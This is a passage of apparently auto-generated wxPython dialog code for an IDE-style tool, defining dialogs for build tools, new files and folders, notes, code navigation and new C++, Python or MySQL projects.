wx.DefaultSize, 0 ) self.m_staticText85.Wrap( -1 ) fgSizer126.Add( self.m_staticText85, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl56 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_textCtrl56.SetMinSize( wx.Size( 150,-1 ) ) fgSizer126.Add( self.m_textCtrl56, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL|wx.EXPAND, 5 ) self.m_staticText35 = wx.StaticText( self, wx.ID_ANY, u"url:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText35.Wrap( -1 ) fgSizer126.Add( self.m_staticText35, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl29 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer126.Add( self.m_textCtrl29, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText351 = wx.StaticText( self, wx.ID_ANY, u"help string:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText351.Wrap( -1 ) fgSizer126.Add( self.m_staticText351, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl30 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer126.Add( self.m_textCtrl30, 0, wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, 5 ) fgSizer125.Add( fgSizer126, 0, wx.RIGHT|wx.LEFT|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL|wx.EXPAND, 5 ) fgSizer125.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) fgSizer158 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer158.AddGrowableCol( 1 ) fgSizer158.SetFlexibleDirection( wx.BOTH ) fgSizer158.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer158.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer10 = wx.StdDialogButtonSizer() self.m_sdbSizer10OK = wx.Button( self, wx.ID_OK ) m_sdbSizer10.AddButton( self.m_sdbSizer10OK ) self.m_sdbSizer10Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer10.AddButton( self.m_sdbSizer10Cancel ) m_sdbSizer10.Realize(); fgSizer158.Add( m_sdbSizer10, 1, wx.EXPAND, 5 ) fgSizer125.Add( fgSizer158, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer125 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_sdbSizer10OK.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnOK( self, event ): event.Skip() ########################################################################### ## Class BuildTools ########################################################################### class BuildTools ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"C++ Build tools", pos = wx.DefaultPosition, size = wx.Size( 537,301 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer101 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer101.AddGrowableCol( 0 ) fgSizer101.AddGrowableRow( 0 ) fgSizer101.SetFlexibleDirection( wx.BOTH ) fgSizer101.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer158 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer158.AddGrowableCol( 0 ) fgSizer158.AddGrowableRow( 0 ) fgSizer158.SetFlexibleDirection( wx.BOTH ) fgSizer158.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_listbook2 = wx.Listbook( self, wx.ID_ANY, wx.DefaultPosition, wx.Size( -1,-1 ), wx.LB_RIGHT ) self.m_panel21 = wx.Panel( self.m_listbook2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer157 = wx.FlexGridSizer( 1, 1, 0, 0 ) fgSizer157.AddGrowableCol( 0 ) fgSizer157.AddGrowableRow( 0 ) fgSizer157.SetFlexibleDirection( wx.BOTH ) fgSizer157.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_auinotebook4 = wx.aui.AuiNotebook( self.m_panel21, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.aui.AUI_NB_BOTTOM ) fgSizer157.Add( self.m_auinotebook4, 1, wx.EXPAND |wx.ALL, 5 ) self.m_panel21.SetSizer( fgSizer157 ) self.m_panel21.Layout() fgSizer157.Fit( self.m_panel21 ) self.m_listbook2.AddPage( self.m_panel21, u"linux gnu", False ) fgSizer158.Add( self.m_listbook2, 1, wx.EXPAND |wx.ALL, 5 ) fgSizer159 = wx.FlexGridSizer( 4, 1, 0, 0 ) fgSizer159.AddGrowableRow( 3 ) fgSizer159.SetFlexibleDirection( wx.BOTH ) fgSizer159.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_bpButton49 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_NEW, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer159.Add( self.m_bpButton49, 0, wx.ALL, 5 ) self.m_bpButton50 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_INFORMATION, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer159.Add( self.m_bpButton50, 0, wx.ALL, 5 ) self.m_bpButton51 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_DELETE, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) self.m_bpButton51.Enable( False ) fgSizer159.Add( self.m_bpButton51, 0, wx.ALL, 5 ) fgSizer158.Add( fgSizer159, 1, wx.EXPAND, 5 ) fgSizer101.Add( fgSizer158, 1, wx.EXPAND, 5 ) fgSizer155 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer155.AddGrowableCol( 1 ) fgSizer155.SetFlexibleDirection( wx.BOTH ) fgSizer155.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer155.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer6 = wx.StdDialogButtonSizer() self.m_sdbSizer6OK = wx.Button( self, wx.ID_OK ) m_sdbSizer6.AddButton( self.m_sdbSizer6OK ) self.m_sdbSizer6Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer6.AddButton( self.m_sdbSizer6Cancel ) m_sdbSizer6.Realize(); fgSizer155.Add( m_sdbSizer6, 1, wx.EXPAND, 5 ) fgSizer101.Add( fgSizer155, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer101 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_bpButton49.Bind( wx.EVT_BUTTON, self.OnAddBinariesProfile ) self.m_bpButton50.Bind( wx.EVT_BUTTON, self.OnEditBinariesProfile ) self.m_bpButton51.Bind( wx.EVT_BUTTON, self.OnDeleteBinariesProfile ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnAddBinariesProfile( self, event ): event.Skip() def OnEditBinariesProfile( self, event ): event.Skip() def OnDeleteBinariesProfile( self, event ): event.Skip() ########################################################################### ## Class NewFile ########################################################################### class NewFile ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"NewFile", pos = wx.DefaultPosition, size = wx.Size( 260,120 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer125 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer125.AddGrowableCol( 0 ) fgSizer125.AddGrowableRow( 0 ) fgSizer125.SetFlexibleDirection( wx.BOTH ) fgSizer125.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer126 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer126.AddGrowableCol( 1 ) fgSizer126.SetFlexibleDirection( wx.BOTH ) fgSizer126.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_ALL ) self.m_staticText85 = wx.StaticText( self, wx.ID_ANY, u"File name", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText85.Wrap( -1 ) fgSizer126.Add( self.m_staticText85, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl56 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_textCtrl56.SetMinSize( wx.Size( 150,-1 ) ) fgSizer126.Add( self.m_textCtrl56, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL|wx.EXPAND, 5 ) fgSizer125.Add( fgSizer126, 0, wx.RIGHT|wx.LEFT|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL, 5 ) fgSizer158 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer158.AddGrowableCol( 1 ) fgSizer158.SetFlexibleDirection( wx.BOTH ) fgSizer158.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer158.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer10 = wx.StdDialogButtonSizer() self.m_sdbSizer10OK = wx.Button( self, wx.ID_OK ) m_sdbSizer10.AddButton( self.m_sdbSizer10OK ) self.m_sdbSizer10Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer10.AddButton( self.m_sdbSizer10Cancel ) m_sdbSizer10.Realize(); fgSizer158.Add( m_sdbSizer10, 1, wx.EXPAND, 5 ) fgSizer125.Add( fgSizer158, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer125 ) self.Layout() self.Centre( wx.BOTH ) def __del__( self ): pass ########################################################################### ## Class NewFolder ########################################################################### class NewFolder ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"New folder", pos = wx.DefaultPosition, size = wx.Size( 423,390 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer6 = wx.FlexGridSizer( 3, 1, 0, 0 ) fgSizer6.AddGrowableCol( 0 ) fgSizer6.AddGrowableRow( 1 ) fgSizer6.SetFlexibleDirection( wx.BOTH ) fgSizer6.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer7 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer7.AddGrowableCol( 1 ) fgSizer7.SetFlexibleDirection( wx.BOTH ) fgSizer7.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText4 = wx.StaticText( self, wx.ID_ANY, u"Name", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText4.Wrap( -1 ) fgSizer7.Add( self.m_staticText4, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl2 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer7.Add( self.m_textCtrl2, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.EXPAND, 5 ) fgSizer6.Add( fgSizer7, 0, wx.EXPAND|wx.ALL, 5 ) sbSizer9 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"Documentation" ), wx.VERTICAL ) self.m_richText3 = wx.richtext.RichTextCtrl( sbSizer9.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.HSCROLL|wx.SUNKEN_BORDER|wx.VSCROLL|wx.WANTS_CHARS ) sbSizer9.Add( self.m_richText3, 1, wx.EXPAND|wx.ALL, 5 ) fgSizer6.Add( sbSizer9, 1, wx.EXPAND, 5 ) fgSizer162 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer162.AddGrowableCol( 1 ) fgSizer162.SetFlexibleDirection( wx.BOTH ) fgSizer162.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer162.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer2 = wx.StdDialogButtonSizer() self.m_sdbSizer2OK = wx.Button( self, wx.ID_OK ) m_sdbSizer2.AddButton( self.m_sdbSizer2OK ) self.m_sdbSizer2Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer2.AddButton( self.m_sdbSizer2Cancel ) m_sdbSizer2.Realize(); fgSizer162.Add( m_sdbSizer2, 1, wx.EXPAND|wx.TOP|wx.BOTTOM, 5 ) fgSizer6.Add( fgSizer162, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer6 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_sdbSizer2OK.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnOK( self, event ): event.Skip() ########################################################################### ## Class codeNavigator ########################################################################### class codeNavigator ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = wx.EmptyString, pos = wx.Point( -1,-1 ), size = wx.Size( 284,404 ), style = 0|wx.NO_BORDER|wx.WANTS_CHARS ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) self.SetExtraStyle( self.GetExtraStyle() | wx.WS_EX_BLOCK_EVENTS ) fgSizer131 = wx.FlexGridSizer( 1, 1, 0, 0 ) fgSizer131.AddGrowableCol( 0 ) fgSizer131.AddGrowableRow( 0 ) fgSizer131.SetFlexibleDirection( wx.BOTH ) fgSizer131.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_treeCtrl3 = wx.TreeCtrl( self, wx.ID_ANY, wx.Point( 0,0 ), wx.DefaultSize, wx.TR_HAS_BUTTONS|wx.TR_HIDE_ROOT|wx.TR_SINGLE ) fgSizer131.Add( self.m_treeCtrl3, 0, wx.EXPAND|wx.ALL, 5 ) self.SetSizer( fgSizer131 ) self.Layout() # Connect Events self.Bind( wx.EVT_KEY_DOWN, self.OnKeyDown ) self.m_treeCtrl3.Bind( wx.EVT_KEY_DOWN, self.OnKeyDown ) self.m_treeCtrl3.Bind( wx.EVT_TREE_ITEM_ACTIVATED, self.OnSelectedItem ) self.m_treeCtrl3.Bind( wx.EVT_TREE_ITEM_EXPANDED, self.OnExpandItem ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnKeyDown( self, event ): event.Skip() def OnSelectedItem( self, event ): event.Skip() def OnExpandItem( self, event ): event.Skip() ########################################################################### ## Class Import ########################################################################### class Import ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = wx.EmptyString, pos = wx.DefaultPosition, size = wx.DefaultSize, style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) self.Centre( wx.BOTH ) def __del__( self ): pass ########################################################################### ## Class NewNote ########################################################################### class NewNote ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"New note", pos = wx.DefaultPosition, size = wx.Size( 480,299 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer103 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer103.AddGrowableCol( 0 ) fgSizer103.AddGrowableRow( 0 ) fgSizer103.SetFlexibleDirection( wx.BOTH ) fgSizer103.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) sbSizer30 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, wx.EmptyString ), wx.VERTICAL ) self.m_text = wx.richtext.RichTextCtrl( sbSizer30.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS ) sbSizer30.Add( self.m_text, 1, wx.EXPAND |wx.ALL, 5 ) fgSizer103.Add( sbSizer30, 1, wx.EXPAND|wx.ALL, 5 ) fgSizer156 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer156.AddGrowableCol( 1 ) fgSizer156.SetFlexibleDirection( wx.BOTH ) fgSizer156.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer156.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer7 = wx.StdDialogButtonSizer() self.m_sdbSizer7OK = wx.Button( self, wx.ID_OK ) m_sdbSizer7.AddButton( self.m_sdbSizer7OK ) self.m_sdbSizer7Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer7.AddButton( self.m_sdbSizer7Cancel ) m_sdbSizer7.Realize(); fgSizer156.Add( m_sdbSizer7, 1, wx.EXPAND, 5 ) fgSizer103.Add( fgSizer156, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer103 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_sdbSizer7OK.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnOK( self, event ): event.Skip() ########################################################################### ## Class NewProject ########################################################################### class NewProject ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"New Project", pos = wx.DefaultPosition, size = wx.Size( 436,561 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) self.fgSizer4 = wx.FlexGridSizer( 2, 1, 0, 0 ) self.fgSizer4.AddGrowableCol( 0 ) self.fgSizer4.AddGrowableRow( 0 ) self.fgSizer4.SetFlexibleDirection( wx.BOTH ) self.fgSizer4.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_ALL ) self.m_auinotebook2 = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.NB_BOTTOM ) self.m_panel5 = wx.Panel( self.m_auinotebook2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) self.fgSizer65 = wx.FlexGridSizer( 3, 1, 0, 0 ) self.fgSizer65.AddGrowableCol( 0 ) self.fgSizer65.AddGrowableRow( 1 ) self.fgSizer65.SetFlexibleDirection( wx.BOTH ) self.fgSizer65.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer5 = wx.FlexGridSizer( 5, 2, 0, 0 ) fgSizer5.AddGrowableCol( 1 ) fgSizer5.SetFlexibleDirection( wx.BOTH ) fgSizer5.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText2 = wx.StaticText( self.m_panel5, wx.ID_ANY, u"Name:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText2.Wrap( -1 ) fgSizer5.Add( self.m_staticText2, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl1 = wx.TextCtrl( self.m_panel5, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer5.Add( self.m_textCtrl1, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText3 = wx.StaticText( self.m_panel5, wx.ID_ANY, u"Base directory:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText3.Wrap( -1 ) fgSizer5.Add( self.m_staticText3, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) fgSizer29 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer29.AddGrowableCol( 0 ) fgSizer29.SetFlexibleDirection( wx.BOTH ) fgSizer29.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_textCtrl9 = wx.TextCtrl( self.m_panel5, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_READONLY ) fgSizer29.Add( self.m_textCtrl9, 0, wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_bpButton3 = wx.BitmapButton( self.m_panel5, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_FOLDER_OPEN, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer29.Add( self.m_bpButton3, 0, wx.ALL, 5 ) fgSizer5.Add( fgSizer29, 1, wx.EXPAND, 5 ) self.fgSizer65.Add( fgSizer5, 1, wx.EXPAND|wx.ALL, 5 ) self.m_choicebook1 = wx.Choicebook( self.m_panel5, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.CHB_DEFAULT ) self.m_panel18 = wx.Panel( self.m_choicebook1, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer130 = wx.FlexGridSizer( 3, 2, 0, 0 ) fgSizer130.AddGrowableCol( 1 ) fgSizer130.SetFlexibleDirection( wx.BOTH ) fgSizer130.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText30 = wx.StaticText( self.m_panel18, wx.ID_ANY, u"Headers subdir.:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText30.Wrap( -1 ) fgSizer130.Add( self.m_staticText30, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl23 = wx.TextCtrl( self.m_panel18, wx.ID_ANY, u"include", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer130.Add( self.m_textCtrl23, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText31 = wx.StaticText( self.m_panel18, wx.ID_ANY, u"Sources subdir.:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText31.Wrap( -1 ) fgSizer130.Add( self.m_staticText31, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl24 = wx.TextCtrl( self.m_panel18, wx.ID_ANY, u"src", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer130.Add( self.m_textCtrl24, 0, wx.ALL|wx.EXPAND, 5 ) self.m_checkBox52 = wx.CheckBox( self.m_panel18, wx.ID_ANY, u"master include", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_checkBox52.SetValue(True) fgSizer130.Add( self.m_checkBox52, 0, wx.ALL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl25 = wx.TextCtrl( self.m_panel18, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer130.Add( self.m_textCtrl25, 0, wx.ALL|wx.EXPAND, 5 ) self.m_panel18.SetSizer( fgSizer130 ) self.m_panel18.Layout() fgSizer130.Fit( self.m_panel18 ) self.m_choicebook1.AddPage( self.m_panel18, u"c++ project", True ) self.m_panel19 = wx.Panel( self.m_choicebook1, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) self.m_choicebook1.AddPage( self.m_panel19, u"python project", False ) self.m_panel13 = wx.Panel( self.m_choicebook1, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer58 = wx.FlexGridSizer( 1, 1, 0, 0 ) fgSizer58.AddGrowableCol( 0 ) fgSizer58.AddGrowableRow( 0 ) fgSizer58.SetFlexibleDirection( wx.BOTH ) fgSizer58.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_choicebook4 = wx.Choicebook( self.m_panel13, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.CHB_DEFAULT ) self.m_panel14 = wx.Panel( self.m_choicebook4, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer59 = wx.FlexGridSizer( 3, 1, 0, 0 ) fgSizer59.AddGrowableCol( 0 ) fgSizer59.SetFlexibleDirection( wx.BOTH ) fgSizer59.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer60 = wx.FlexGridSizer( 3, 2, 0, 0 ) fgSizer60.AddGrowableCol( 1 ) fgSizer60.SetFlexibleDirection( wx.BOTH ) fgSizer60.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText29 = wx.StaticText( self.m_panel14, wx.ID_ANY, u"Host:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText29.Wrap( -1 ) fgSizer60.Add( self.m_staticText29, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl252 = wx.TextCtrl( self.m_panel14, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer60.Add( self.m_textCtrl252, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText27 = wx.StaticText( self.m_panel14, wx.ID_ANY, u"User:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText27.Wrap( -1 ) fgSizer60.Add( self.m_staticText27, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl231 = wx.TextCtrl( self.m_panel14, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer60.Add( self.m_textCtrl231, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText28 = wx.StaticText( self.m_panel14, wx.ID_ANY, u"Password:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText28.Wrap( -1 ) fgSizer60.Add( self.m_staticText28, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl241 = wx.TextCtrl( self.m_panel14, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_PASSWORD ) fgSizer60.Add( self.m_textCtrl241, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer59.Add( fgSizer60, 1, wx.EXPAND, 5 ) sbSizer8 = wx.StaticBoxSizer( wx.StaticBox( self.m_panel14, wx.ID_ANY, u"Default schema" ), wx.VERTICAL ) m_comboBox1Choices = [] self.m_comboBox1 = wx.ComboBox( sbSizer8.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, m_comboBox1Choices, 0 ) sbSizer8.Add( self.m_comboBox1, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer59.Add( sbSizer8, 1, wx.EXPAND, 5 ) fgSizer61 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer61.AddGrowableCol( 0 ) fgSizer61.SetFlexibleDirection( wx.BOTH ) fgSizer61.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer61.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) self.m_button3 = wx.Button( self.m_panel14, wx.ID_ANY, u"Test connection", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_button3.Enable( False ) fgSizer61.Add( self.m_button3, 0, wx.ALL, 5 ) fgSizer59.Add( fgSizer61, 1, wx.EXPAND, 5 ) self.m_panel14.SetSizer( fgSizer59 ) self.m_panel14.Layout() fgSizer59.Fit( self.m_panel14 ) self.m_choicebook4.AddPage( self.m_panel14, u"mysql", False ) fgSizer58.Add( self.m_choicebook4, 1, wx.EXPAND|wx.TOP|wx.BOTTOM, 5 ) self.m_panel13.SetSizer( fgSizer58 ) self.m_panel13.Layout() fgSizer58.Fit( self.m_panel13 ) self.m_choicebook1.AddPage( self.m_panel13, u"database project", False ) self.fgSizer65.Add( self.m_choicebook1, 1, wx.EXPAND |wx.ALL, 5 ) self.m_panel5.SetSizer( self.fgSizer65 ) self.m_panel5.Layout() self.fgSizer65.Fit( self.m_panel5 ) self.m_auinotebook2.AddPage( self.m_panel5, u"General", True ) self.m_panel6 = wx.Panel( self.m_auinotebook2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer69 = wx.FlexGridSizer( 2, 1, 0, 